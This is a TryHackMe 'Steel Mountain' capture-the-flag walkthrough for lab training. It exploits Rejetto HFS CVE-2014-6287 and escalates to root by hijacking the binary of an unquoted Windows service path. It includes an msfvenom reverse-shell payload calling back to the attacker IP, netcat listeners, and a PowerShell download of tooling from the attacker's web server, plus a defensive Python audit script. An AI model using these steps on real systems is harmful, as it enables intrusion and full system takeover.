TryHackMe Writeup: Steel Mountain
First, we start off with simple enumeration
nmap -sC -sV -Pn 10.10.103.240
Now, since we know nmap scans can take a bit, we can discern that we have a little extra time to do some manual enumeration. With that said, let's see if this server is set up as a webserver and check common web ports 80, 8080 and 443
Port 80 looks like a standard web site
Port 8080 appears to be a file server
Now in the first screenshot (port 80), we see an "Employee of the month". This is also the first question that appears on TryHackMe. Since there doesn't appear to be any information other than the photo on the site, let's check the page source to see if the image is named after this mysterious person
Hmmmm… could it be Bill Harper? Yes, yes it is!
The second question is asking what other port a web server is running on. Our quick pre-nmap check showed port 8080 was running a file server. So we will enter 8080.
The next question is asking what file server is running. A quick glance at the page shows “HTTPFileServer 2.3”.
Since that clearly isn’t the answer, we click the highlighted link at the bottom and it takes us to a “rejetto http file server” site.
Let’s input that answer and move on.
Now before we go any further, let’s check the results of the nmap scan we launched earlier
It appears that SMB and RDP are also open. This might come in handy later! But for now, let’s go ahead and fire up Metasploit. We are gonna do a quick check and see if there’s a module for the file server.
Hmmm…
Ok, let's go ahead and configure and run this, since it seems promising and appears to match the software that is running.
set RHOSTS 10.10.103.240
set LHOST 10.9.240.85
set RPORT 8080
set LPORT 4444
Bombs away!
Annnnnnddddd BOOOMM!!
Looks like we have a low privileged shell under “Bill’s” UID
So we should have enough info to complete the next two questions. The CVE is CVE-2014-6287. We got this by typing the following into MSF:
info exploit/windows/http/rejetto_hfs_exec
The next question asks what the user flag is. So we will navigate through Bill's user folders and try to locate the file
cd C:\Users\bill\*
We find a user.txt file on Bill’s Desktop. So we read it and discover the following:
Let’s enter that info as a flag and move on.
The next task is asking us to download a set of PowerShell scripts and upload the "exploit" to the target machine. So after downloading, I loaded Meterpreter's powershell extension, uploaded and ran the PowerUp file.
We will now load the PowerShell shell and run the script
powershell_shell
. .\PowerUp.ps1
Invoke-AllChecks
The next question asks what service shows up as an unquoted service path vulnerability and also has CanRestart set to True. Looks like it’s the AdvancedSystemCareService9 service
The next part is kind of tricky. The TryHackMe tutorial says to create a payload using msfvenom to replace the binary and name it “Advanced.exe”. This won’t work, as the name of the actual binary is ASCService.exe. So we will use that as the name instead
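Because this step is about recognising the misconfiguration rather than using it, here is an added Python example (my own code, not from the room, PowerUp or winPEAS) that applies the same test a defender would run over an exported service list: flag ImagePath values whose executable part is unquoted and contains spaces, and produce the quoted form plus the `sc config` line that removes the condition. The service list is constructed for the example; only the IObit path is the one from this writeup, and the `can_restart` field is an assumption mirroring PowerUp's CanRestart column.

```python
import re
from dataclasses import dataclass


@dataclass
class ServiceEntry:
    """One Windows service as exported for review (name, ImagePath, restart right).

    can_restart is a constructed field mirroring PowerUp's CanRestart column.
    """
    name: str
    image_path: str
    can_restart: bool = False


# Constructed sample input. The IObit path is the one from this room; the
# other three entries are made up here to exercise the edge cases.
SAMPLE_SERVICES = [
    ServiceEntry("AdvancedSystemCareService9",
                 r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe", True),
    ServiceEntry("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ServiceEntry("QuotedVendorSvc", r'"C:\Program Files\Vendor\vendorsvc.exe" -service'),
    ServiceEntry("UnquotedWithArgs", r"C:\Program Files\Vendor Two\agent.exe -k start"),
]


def split_exe_and_args(image_path: str):
    """Split an ImagePath into (executable, arguments) at the first '.exe' token."""
    m = re.search(r"\.exe\b", image_path, flags=re.IGNORECASE)
    if not m:
        return image_path.strip(), ""
    return image_path[: m.end()].strip(), image_path[m.end():].strip()


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the executable portion contains spaces and is not wrapped in quotes."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    exe, _ = split_exe_and_args(p)
    return " " in exe


def quoted_fix(image_path: str) -> str:
    """Return the ImagePath with the executable wrapped in double quotes (idempotent)."""
    p = image_path.strip()
    if p.startswith('"'):
        return p
    exe, args = split_exe_and_args(p)
    return f'"{exe}" {args}'.strip()


def sc_config_command(name: str, image_path: str) -> str:
    """cmd.exe remediation line; the inner quotes are escaped for sc.exe's binPath= value."""
    inner = quoted_fix(image_path).replace('"', '\\"')
    return f'sc config {name} binPath= "{inner}"'


def audit_services(entries):
    """Return (name, can_restart, fixed_path) for every unquoted-with-spaces service."""
    return [(e.name, e.can_restart, quoted_fix(e.image_path))
            for e in entries if is_unquoted_with_spaces(e.image_path)]


if __name__ == "__main__":
    for entry in SAMPLE_SERVICES:
        if is_unquoted_with_spaces(entry.image_path):
            print(f"{entry.name}: unquoted path with spaces, CanRestart={entry.can_restart}")
            print("  remediation:", sc_config_command(entry.name, entry.image_path))
```

The check splits at the first `.exe` token so that trailing service arguments are preserved in the quoted result, and it leaves already-quoted entries untouched so the audit can be rerun safely after the fix has been applied.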
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.240.85 LPORT=4443 -f exe -o ASCService.exe
Now set up a netcat listener to “catch” the shell
nc -nvlp 4443
Next, we will go into our current meterpreter session, drop into a shell and stop the current service
Then we will upload our malicious file and restart the service
Uh oh, that error doesn't look good… Let's check our netcat listener
Phew, we're good! Now let's read the root flag
#WINNING
Task 4
So at this point, I had walked away for a minute, only to return to an expired machine. So for the rest of the walkthrough, the IP address of the target will now be 10.10.227.39
For this task, it is essentially asking you to do the same thing, sans Metasploit. We begin by exploiting the same CVE, but using an exploit given by TryHackMe
https://www.exploit-db.com/exploits/39161
In addition to downloading that, we also need a netcat binary found here:
https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
We also need a webserver to serve up the file. If you have Apache installed, you can use that. I, however, will be using Python's SimpleHTTPServer (http.server in Python 3). Open one terminal window, navigate to the ncat file you downloaded, rename it to nc.exe and start the server.
python3 -m http.server 80
Next, set up a listener in a separate window
nc -nvlp 1337
Modify the exploit to include your IP and the port your listener is listening on
Now run the exploit at least twice. If successful, you should now have a shell!
Now, since we are going to use winPEAS to enumerate the system, let's go ahead and move the webserver we started to the directory where winPEAS is stored
cd /root/Desktop/tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x86/Release
python3 -m http.server 80
Now on the target shell we spawned, run:
powershell -c wget "http://10.9.240.85/winPEAS.exe" -outfile "winpeas.exe"
Once run, we should see that we have Write/Create permissions on the same service binary path that we exploited earlier
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
We can generate a new msfvenom payload, or use the one created previously to run on port 4443. I will use that one.
First, let’s create a netcat listener to catch our shell
nc -nvlp 4443
Starting on Bill's desktop, we are going to upload our payload
Now stop the current service
And copy and overwrite the current service with our payload and restart the service
We should now have r00t!